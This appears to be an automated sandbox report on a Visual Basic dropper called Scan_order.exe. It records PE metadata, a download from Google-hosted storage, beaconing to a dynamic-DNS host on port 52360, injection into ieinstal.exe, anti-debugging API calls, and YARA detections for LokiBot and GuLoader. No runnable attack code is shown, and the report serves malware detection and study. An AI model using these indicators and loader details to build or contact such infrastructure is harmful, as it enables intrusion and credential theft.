File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...5>.O..................... ......\.............@................

File Icon


Icon Hash:	1adaf8c2cacada48

Static PE Info

General
Entrypoint:	0x40145c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4F063E35 [Fri Jan 6 00:20:05 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	064d9ba8d40942674328edc4d8e0fd2c

Entrypoint Preview

Instruction
push 0040AB44h
call 00007F03F4CDB823h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xchg eax, ebp
test byte ptr [eax-1Dh], al
push esp
dec ebp
or cl, byte ptr [ebx-5Fh]
popfd
adc byte ptr [esi-62h], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10904	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x120	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfe00	0x10000	False	0.402313232422	data	5.25950000678	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x11000	0xa18	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xfd0	0x1000	False	0.179443359375	data	2.23330666999	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x12328	0xca8	data
RT_GROUP_ICON	0x12314	0x14	data
RT_VERSION	0x120f0	0x224	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	UNFUGI
FileVersion	1.00
CompanyName	Double Fine Productions
ProductName	COPR
ProductVersion	1.00
OriginalFilename	UNFUGI.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 08:12:01.061997890 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.104787111 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.104908943 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.105503082 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.148252010 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.161623001 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.161823034 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.161878109 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.161914110 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.162003040 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.162054062 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.179040909 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.222057104 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.222176075 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.224553108 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.271717072 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500399113 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500454903 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500499010 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500540972 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500581980 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.500664949 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.500698090 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.503282070 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.503338099 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.504602909 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.506263018 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.506310940 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.506398916 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.509248972 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.509289980 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.509393930 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.509413958 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.512204885 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.512252092 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.513495922 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.514645100 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.514693975 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.514758110 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.543378115 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.543421984 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.543456078 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.543481112 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.544977903 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.545031071 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.545147896 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.547833920 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.547884941 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.548156977 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.550843954 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.550885916 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.550925016 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.550945997 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.553823948 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.553863049 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.555123091 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.556824923 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.556863070 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.556948900 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.557034016 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.559856892 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.559895992 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.562644005 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.562880993 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.562927008 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.565923929 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.565979958 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.566020966 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.566052914 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.568497896 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.568547964 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.568651915 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.571171999 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.571213007 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.571341038 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.573820114 CET	443	49754	172.217.23.1	192.168.2.3
Jan 11, 2021 08:12:01.574940920 CET	49754	443	192.168.2.3	172.217.23.1
Jan 11, 2021 08:12:01.864685059 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:02.080409050 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:02.082844019 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:02.085031033 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:02.341301918 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:02.460266113 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:02.467345953 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:02.730282068 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:07.461051941 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:07.464006901 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:07.720292091 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:12.470863104 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:12.516609907 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:12.615115881 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:12.880552053 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:17.470907927 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:17.473575115 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:17.751055956 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:22.480979919 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:22.485896111 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:22.750473022 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:27.470366955 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:27.473355055 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:27.745486021 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:32.480315924 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:32.484983921 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:32.751436949 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:37.511238098 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:37.515072107 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:37.770097017 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:42.490165949 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:42.493978977 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:42.755808115 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:45.595877886 CET	52360	49755	185.157.161.61	192.168.2.3
Jan 11, 2021 08:12:45.644468069 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:46.974909067 CET	49755	52360	192.168.2.3	185.157.161.61
Jan 11, 2021 08:12:50.213598967 CET	49754	443	192.168.2.3	172.217.23.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2021 08:08:56.034691095 CET	63492	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:08:56.085526943 CET	53	63492	8.8.8.8	192.168.2.3
Jan 11, 2021 08:08:57.539195061 CET	60831	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:08:57.590198040 CET	53	60831	8.8.8.8	192.168.2.3
Jan 11, 2021 08:08:58.997844934 CET	60100	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:08:59.059166908 CET	53	60100	8.8.8.8	192.168.2.3
Jan 11, 2021 08:08:59.992403030 CET	53195	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:00.040544033 CET	53	53195	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:01.331974983 CET	50141	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:01.382942915 CET	53	50141	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:02.373349905 CET	53023	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:02.421516895 CET	53	53023	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:03.819200993 CET	49563	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:03.867108107 CET	53	49563	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:04.752156973 CET	51352	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:04.800386906 CET	53	51352	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:06.000201941 CET	59349	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:06.048269987 CET	53	59349	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:07.186904907 CET	57084	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:07.235117912 CET	53	57084	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:08.298183918 CET	58823	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:08.346400976 CET	53	58823	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:09.535099983 CET	57568	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:09.583108902 CET	53	57568	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:28.973202944 CET	50540	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:29.032784939 CET	53	50540	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:37.395679951 CET	54366	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:37.443648100 CET	53	54366	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:38.408901930 CET	53034	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:38.456998110 CET	53	53034	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:50.190967083 CET	57762	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:50.250932932 CET	53	57762	8.8.8.8	192.168.2.3
Jan 11, 2021 08:09:59.925106049 CET	55435	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:09:59.989722013 CET	53	55435	8.8.8.8	192.168.2.3
Jan 11, 2021 08:10:14.570008039 CET	50713	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:10:14.620887995 CET	53	50713	8.8.8.8	192.168.2.3
Jan 11, 2021 08:10:19.093394995 CET	56132	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:10:19.153832912 CET	53	56132	8.8.8.8	192.168.2.3
Jan 11, 2021 08:10:50.901370049 CET	58987	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:10:50.949441910 CET	53	58987	8.8.8.8	192.168.2.3
Jan 11, 2021 08:10:56.035588026 CET	56579	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:10:56.083764076 CET	53	56579	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:46.976233006 CET	60633	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:47.098877907 CET	53	60633	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:49.292625904 CET	61292	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:49.349224091 CET	53	61292	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:50.505830050 CET	63619	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:50.562891006 CET	53	63619	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:51.038547039 CET	64938	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:51.095021009 CET	53	64938	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:51.672871113 CET	61946	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:51.734428883 CET	53	61946	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:52.378628016 CET	64910	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:52.437542915 CET	53	64910	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:53.229226112 CET	52123	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:53.341048002 CET	53	52123	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:56.489923954 CET	56130	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:56.549196959 CET	53	56130	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:58.056026936 CET	56338	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:58.112437010 CET	53	56338	8.8.8.8	192.168.2.3
Jan 11, 2021 08:11:58.734754086 CET	59420	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:11:58.791250944 CET	53	59420	8.8.8.8	192.168.2.3
Jan 11, 2021 08:12:00.079550982 CET	58784	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:12:00.144229889 CET	53	58784	8.8.8.8	192.168.2.3
Jan 11, 2021 08:12:00.972094059 CET	63978	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:12:01.049339056 CET	53	63978	8.8.8.8	192.168.2.3
Jan 11, 2021 08:12:01.649941921 CET	62938	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:12:01.862879038 CET	53	62938	8.8.8.8	192.168.2.3
Jan 11, 2021 08:13:44.708283901 CET	55708	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:13:44.765296936 CET	53	55708	8.8.8.8	192.168.2.3
Jan 11, 2021 08:13:45.210810900 CET	56803	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:13:45.267163992 CET	53	56803	8.8.8.8	192.168.2.3
Jan 11, 2021 08:13:49.075913906 CET	57145	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:13:49.124016047 CET	53	57145	8.8.8.8	192.168.2.3
Jan 11, 2021 08:13:53.082916021 CET	55359	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:13:53.133667946 CET	53	55359	8.8.8.8	192.168.2.3
Jan 11, 2021 08:13:53.463779926 CET	58306	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:13:53.520102978 CET	53	58306	8.8.8.8	192.168.2.3
Jan 11, 2021 08:14:53.789446115 CET	64124	53	192.168.2.3	8.8.8.8
Jan 11, 2021 08:14:53.845844984 CET	53	64124	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 11, 2021 08:12:00.972094059 CET	192.168.2.3	8.8.8.8	0x8b1c	Standard query (0)	doc-0c-8c-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Jan 11, 2021 08:12:01.649941921 CET	192.168.2.3	8.8.8.8	0x93ca	Standard query (0)	wealthyblessed.myddns.rocks	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 11, 2021 08:09:37.443648100 CET	8.8.8.8	192.168.2.3	0x3c5e	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 11, 2021 08:12:01.049339056 CET	8.8.8.8	192.168.2.3	0x8b1c	No error (0)	doc-0c-8c-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Jan 11, 2021 08:12:01.049339056 CET	8.8.8.8	192.168.2.3	0x8b1c	No error (0)	googlehosted.l.googleusercontent.com		172.217.23.1	A (IP address)	IN (0x0001)
Jan 11, 2021 08:12:01.862879038 CET	8.8.8.8	192.168.2.3	0x93ca	No error (0)	wealthyblessed.myddns.rocks		185.157.161.61	A (IP address)	IN (0x0001)
Jan 11, 2021 08:13:44.765296936 CET	8.8.8.8	192.168.2.3	0xa7c0	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 11, 2021 08:12:01.161914110 CET	172.217.23.1	443	192.168.2.3	49754	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Dec 15 15:47:09 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Mar 09 15:47:08 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 11, 2021 08:12:01.161914110 CET	172.217.23.1	443	192.168.2.3	49754	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Scan_order.exe PID: 5260 Parent PID: 5568

General

Start time:	08:09:00
Start date:	11/01/2021
Path:	C:\Users\user\Desktop\Scan_order.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Scan_order.exe'
Imagebase:	0x400000
File size:	77824 bytes
MD5 hash:	04BE7ED51E345A56403DF4657B376990
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.204159990.000000000040A000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: ieinstal.exe PID: 5468 Parent PID: 5260

General

Start time:	08:11:36
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\Scan_order.exe'
Imagebase:	0x1250000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: ieinstal.exe PID: 6128 Parent PID: 5260

General

Start time:	08:11:36
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Scan_order.exe'
Imagebase:	0x1250000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: wscript.exe PID: 5776 Parent PID: 6128

General

Start time:	08:12:45
Start date:	11/01/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\uninstall.vbs'
Imagebase:	0xea0000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Scan_order.exe PID: 5260 Parent PID: 5568 Scan_order.exeCOMMON

Executed Functions

Function 021C0549, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(021C059D,?,00000000,00000051,?,?,0000FFFF,?,?,00000000,?,?,?,?,?,?), ref: 021C0566
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Strings

1.!T, xrefs: 021C0634

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 5aa9aa6950f984697407090ec52b9ae1b1d7893210ddf964c6038b2cd84862ed
Instruction ID: 55d407954a50f0460abe6846d6ef02df8700d94874694594a10d639c644d1533
Opcode Fuzzy Hash: 5aa9aa6950f984697407090ec52b9ae1b1d7893210ddf964c6038b2cd84862ed
Instruction Fuzzy Hash: 123116BC7C4315EFEB186E644D91BF97752ABAA360F71822DEC665B1C0D371C841CA11

Uniqueness

Uniqueness Score: -1.00%

Function 021C35E9, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021C45AF: LoadLibraryA.KERNELBASE(?,321C9581,?,021C551C,021C233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 021C4750

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000051,?,?,0000FFFF,?), ref: 021C0663

Strings

rX4, xrefs: 021C363A
1.!T, xrefs: 021C0634

Memory Dump Source

Source File: 00000000.00000002.597011836.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$rX4
API String ID: 543350213-853368578
Opcode ID: ebd943a8e8cb320ca1d67672f568f55d8ab69c67a38a9e3bdf44dbd29f67ed39
